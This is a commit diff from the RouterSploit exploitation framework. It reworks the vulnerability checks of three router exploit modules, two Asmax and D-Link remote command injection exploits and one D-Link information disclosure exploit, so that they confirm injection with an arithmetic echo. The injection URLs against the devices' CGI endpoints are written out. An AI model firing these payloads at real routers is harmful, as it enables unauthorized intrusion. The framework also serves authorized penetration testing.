Fixing false positives with expressions.

devkw · Apr 25, 2016 · 2ec62d3 · 2ec62d3
1 parent 45e7491
commit 2ec62d3
Show file tree

Hide file tree

Showing 3 changed files with 20 additions and 8 deletions.
diff --git a/routersploit/modules/exploits/asmax/ar_804_gu_rce.py b/routersploit/modules/exploits/asmax/ar_804_gu_rce.py
@@ -1,3 +1,5 @@
+import string
+
 from routersploit import (
     exploits,
     print_success,
@@ -62,15 +64,17 @@ def execute(self, cmd):
 
     @mute
     def check(self):
-        mark = random_text(32)
-        cmd = "echo {}".format(mark)
+        number = int(random_text(6, alph=string.digits))
+        solution = number - 1
+
+        cmd = "echo $(({}-1))".format(number)
         url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd))
 
         response = http_request(method="GET", url=url)
         if response is None:
             return False  # target is not vulnerable
 
-        if response.status_code == 200 and mark in response.text:
+        if response.status_code == 200 and str(solution) in response.text:
             return True  # target is vulnerable
 
         return False  # target is not vulnerable
diff --git a/routersploit/modules/exploits/dlink/dns_320l_327l_rce.py b/routersploit/modules/exploits/dlink/dns_320l_327l_rce.py
@@ -1,4 +1,5 @@
 import re
+import string
 
 from routersploit import (
     exploits,
@@ -72,15 +73,17 @@ def execute(self, cmd):
 
     @mute
     def check(self):
-        mark = random_text(32)
-        cmd = "echo {}".format(mark)
+        number = int(random_text(6, alph=string.digits))
+        solution = number - 1
+
+        cmd = "echo $(({}-1))".format(number)
         url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd))
 
         response = http_request(method="GET", url=url)
         if response is None:
             return False  # target is not vulnerable
 
-        if response.status_code == 200 and mark in response.text:
+        if response.status_code == 200 and str(solution) in response.text:
             return True  # target is vulnerable
 
         return False  # target is not vulnerable
diff --git a/routersploit/modules/exploits/dlink/dwr_932_info_disclosure.py b/routersploit/modules/exploits/dlink/dwr_932_info_disclosure.py
@@ -68,7 +68,12 @@ def check(self):
         if response is None:
             return False  # target is not vulnerable
 
-        if response.status_code == 200 and 'wifi_AP1_ssid' in response.text:
-            return True  # target is vulnerable
+        if response.status_code == 200:
+            try:
+                data = json.loads(response.text)
+                if len(data):
+                    return True  # target is vulnerable
+            except ValueError:
+                return False  # target is not vulnerable
 
         return False  # target is not vulnerable